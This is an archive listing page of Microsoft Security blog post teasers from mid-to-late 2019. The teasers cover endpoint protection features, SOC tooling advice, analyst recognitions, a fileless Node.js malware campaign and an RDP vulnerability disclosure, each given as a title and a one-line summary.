Microsoft security intelligence – Page 11

In hot pursuit of elusive threats: AI-driven behavior-based blocking stops attacks in their tracks

October 8, 2019 0 Comments AI and machine learning, amsi paired machine learning, automation, behavior-based machine learning, behavioral blocking and containment, cybersecurity, endpoint protection platform, Endpoint security, Microsoft Defender ATP, Microsoft security intelligence, Security Intelligence, threat and malware prevention

Credit to Author: Eric Avena| Date: Tue, 08 Oct 2019 15:00:11 +0000

Two new machine learning protection features within the behavioral blocking and containment capabilities in Microsoft Defender ATP specialize in detecting threats by analyzing behavior, adding new layers of protection after an attack has started running.

The post In hot pursuit of elusive threats: AI-driven behavior-based blocking stops attacks in their tracks appeared first on Microsoft Security .

Microsoft Security

CISO series: Lessons learned from the Microsoft SOC—Part 3a: Choosing SOC tools

October 7, 2019 0 Comments Azure Security, CISO series, Ciso series page, Microsoft security intelligence, Security strategies

Credit to Author: Todd VanderArk| Date: Mon, 07 Oct 2019 21:20:56 +0000

In the next post of our series, we provide tips on choosing technology to help a security operations center (SOC) be more responsive, effective, and collaborative.

The post CISO series: Lessons learned from the Microsoft SOC—Part 3a: Choosing SOC tools appeared first on Microsoft Security .

Microsoft Security

Forrester names Microsoft a Leader in 2019 Endpoint Security Suites Wave

October 1, 2019 0 Comments cybersecurity, Microsoft 365, Microsoft Defender Advanced Threat Protection, Microsoft Defender ATP, Microsoft security intelligence, the forrester wave endpoint security suites, Windows Security

Credit to Author: Eric Avena| Date: Tue, 01 Oct 2019 17:30:05 +0000

Microsoft is positioned as a leader in The Forrester Wave™: Endpoint Security Suites, Q3 2019, receiving among the second highest scores in both the strategy and market presence categories.

The post Forrester names Microsoft a Leader in 2019 Endpoint Security Suites Wave appeared first on Microsoft Security .

Microsoft Security

Bring your own LOLBin: Multi-stage, fileless Nodersok campaign delivers rare Node.js-based malware

September 26, 2019 0 Comments AI and machine learning, cybersecurity, Endpoint security, fileless, Microsoft Defender Advanced Threat Protection, Microsoft security intelligence, nodersok, Security Intelligence

Credit to Author: Eric Avena| Date: Thu, 26 Sep 2019 17:34:41 +0000

A new fileless malware campaign we dubbed Nodersok delivers two very unusual LOLBins to turn infected machines into zombie proxies.

The post Bring your own LOLBin: Multi-stage, fileless Nodersok campaign delivers rare Node.js-based malware appeared first on Microsoft Security .

Microsoft Security

Operational resilience begins with your commitment to and investment in cyber resilience

September 17, 2019 0 Comments Cybersecurity policy, Microsoft security intelligence, Threat protection

Credit to Author: Todd VanderArk| Date: Tue, 17 Sep 2019 16:00:37 +0000

Operational resilience cannot be achieved without a true commitment to and investment in cyber resilience.

The post Operational resilience begins with your commitment to and investment in cyber resilience appeared first on Microsoft Security .

Microsoft Security

Deep learning rises: New methods for detecting malicious PowerShell

September 3, 2019 0 Comments AI and machine learning, cybersecurity, deep learning, Endpoint security, Machine Learning, Microsoft Defender ATP, Microsoft security intelligence, PowerShell, Security Intelligence, Threat protection

Credit to Author: Eric Avena| Date: Tue, 03 Sep 2019 16:00:03 +0000

We adopted a deep learning technique that was initially developed for natural language processing and applied to expand Microsoft Defender ATP’s coverage of detecting malicious PowerShell scripts, which continue to be a critical attack vector.

The post Deep learning rises: New methods for detecting malicious PowerShell appeared first on Microsoft Security .

Microsoft Security

Gartner names Microsoft a Leader in 2019 Endpoint Protection Platforms Magic Quadrant

August 23, 2019 0 Comments cybersecurity, endpoint protection platform (EPP), Gartner, Magic Quadrant (MQ), Microsoft Defender ATP, Microsoft security intelligence, Windows Security

Credit to Author: Eric Avena| Date: Fri, 23 Aug 2019 16:00:40 +0000

Gartner named Microsoft a Leader in the 2019 Gartner Magic Quadrant for Endpoint Protection Platforms positioned highest in execution

The post Gartner names Microsoft a Leader in 2019 Endpoint Protection Platforms Magic Quadrant appeared first on Microsoft Security .

Microsoft Security

From unstructured data to actionable intelligence: Using machine learning for threat intelligence

August 8, 2019 0 Comments AI and machine learning, automation, cybersecurity, Endpoint security, indicators of compromise (IoC), Machine Learning, Microsoft Defender Advanced Threat Protection, Microsoft security intelligence, Security Intelligence, threat intelligence, TTPs, Windows Security

Credit to Author: Eric Avena| Date: Thu, 08 Aug 2019 16:30:12 +0000

Machine learning and natural language processing can automate the processing of unstructured text for insightful, actionable threat intelligence.

The post From unstructured data to actionable intelligence: Using machine learning for threat intelligence appeared first on Microsoft Security .

Microsoft Security

A case study in industry collaboration: Poisoned RDP vulnerability disclosure and response

August 7, 2019 0 Comments CVE-2019-0887, cybersecurity, Endpoint security, Event Tracing for Windows (ETW), Exploit, Microsoft Defender Advanced Threat Protection, Microsoft security intelligence, Remote Desktop Protocol (RDP), Security Response, vulnerability, Windows Security

Credit to Author: Eric Avena| Date: Wed, 07 Aug 2019 23:50:25 +0000

Through a cross-company, cross-continent collaboration, we discovered a vulnerability, secured customers, and developed fix, all while learning important lessons that we can share with the industry.

The post A case study in industry collaboration: Poisoned RDP vulnerability disclosure and response appeared first on Microsoft Security .

Microsoft Security

How Windows Defender Antivirus integrates hardware-based system integrity for informed, extensive endpoint protection

July 31, 2019 0 Comments assertion engine, cybersecurity, hardware-based isolation, kernel-mode attacks, Microsoft Defender Advanced Threat Protection, Microsoft security intelligence, next generation protection, privilege escalation, runtime attestation, Security Intelligence, Threat protection, token swap, token theft, Windows Defender Antivirus, Windows Security

Credit to Author: Eric Avena| Date: Wed, 31 Jul 2019 16:30:35 +0000

The deep integration of Windows Defender Antivirus with hardware-based isolation capabilities allows the detection of artifacts of attacks that tamper with kernel-mode agents at the hypervisor level.

The post How Windows Defender Antivirus integrates hardware-based system integrity for informed, extensive endpoint protection appeared first on Microsoft Security .